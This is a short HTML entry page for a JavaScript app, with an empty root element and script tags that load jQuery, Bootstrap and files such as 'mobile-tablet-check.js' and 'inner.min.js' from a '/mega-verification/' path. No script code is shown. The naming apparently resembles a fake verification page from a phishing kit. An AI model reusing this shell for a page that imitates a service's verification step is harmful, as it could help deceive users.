<!doctype html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  </head>
  <body>
    <div id="root"></div>
    <script type="module" src="/src/main.jsx"></script>
    <script type="text/javascript" src="/mega-verification/v2/js/p2/jquery.min.js"></script>
    <script type="text/javascript" src="/mega-verification/v2/js/p2/jquery-ui.min.js"></script>
    <script src="/mega-verification/v2/js/p2/bootstrap.bundle.js"></script>
    <script data-cfasync="false" src="/mega-verification/v2/js/p2/email-decode.min.js"></script>
    
    <script src="/mega-verification/v2/js/p2/mobile-tablet-check.js"></script>
    
    <script src="/mega-verification/v2/js/p2/inner.min.js"></script>
  </body>
</html>
